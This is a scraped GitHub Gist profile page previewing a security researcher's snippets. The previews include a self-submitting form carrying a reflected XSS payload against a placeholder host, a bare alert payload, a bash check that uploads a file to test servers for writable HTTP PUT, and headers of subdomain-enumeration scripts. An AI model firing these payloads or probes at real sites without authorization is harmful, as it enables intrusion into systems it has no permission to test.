Skip to content

Instantly share code, notes, and snippets.

View bing0o's full-sized avatar
☠️
Human Error X-P

med pro bing0o

☠️
Human Error X-P
View GitHub Profile
!
"
#
$
%
&
'
(
)
*
<form name=TheForm action=https://HOSTNAME/menu/stapp method=post>
<input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'>
</form>
<script>
document.TheForm.submit();
</script>
<script>alert(1337)</script>
#!/bin/bash
#
# script for subdomain enumeration using 4 of the best tools with some APIs:
# * findomain: https://github.com/Edu4rdSHL/findomain
# * SubFinder: https://github.com/projectdiscovery/subfinder
# * Amass: https://github.com/OWASP/Amass
# * AssetFinder: https://github.com/tomnomnom/assetfinder
#
# a perl version is being developed by @terminalforlife
# * https://github.com/terminalforlife/PerlProjects/tree/master/source/dominator
#!/bin/bash
PUT() {
curl -sk -XPUT "$1/bing0o.txt" -H "User-Agent: Mozilla/5.0" -d "bing0o Haxor PUT method" &>/dev/null
res=$(curl -sk "$1/bing0o.txt")
if [[ "$res" =~ "bing0o Haxor PUT method" ]]
then
echo "Vulnerable: $1/bing0o.txt" | tee -a "$2"
fi
}
#!/usr/bin/env python
import hashlib
from optparse import *
class colors:
def __init__(self):
self.blue = "\033[94m"
self.red = "\033[91m"
#!/bin/bash
Usage(){
echo -e "$blue
#Options:
\r -l, --list - List of Assets.
\r -u, --use - Use a Specific Function (split/probe).
\r -t, --thread - Thread Number For HTTProbe.
\r -n, --number - The Number of How Many Hosts in Each Part.
\r -o, --output - The output Directory to save the Results.
#!/bin/bash
transfer() {
[ -z "$1" ] && { echo "Usage: ./transfer file.txt"; exit 1; }
[ -z "$2" ] && fl=${1##*/} || fl=$2
curl --upload-file $1 https://transfer.sh/$fl
}
transfer
cloud-av.com
gearheadsupport.com
leafnetworks.net
mynetgear.net
myreadynas.com
mystora.com
mystora.net
mywifiext.com
mywifiext.net
mywifiextender.net
#!/bin/bash
usage() {
echo -e "
#Options:
-f, --file\t the domains list file
-t, --thread\t the threads number
-w, --wordlist\t the wordlist
-o, --output\t the output directory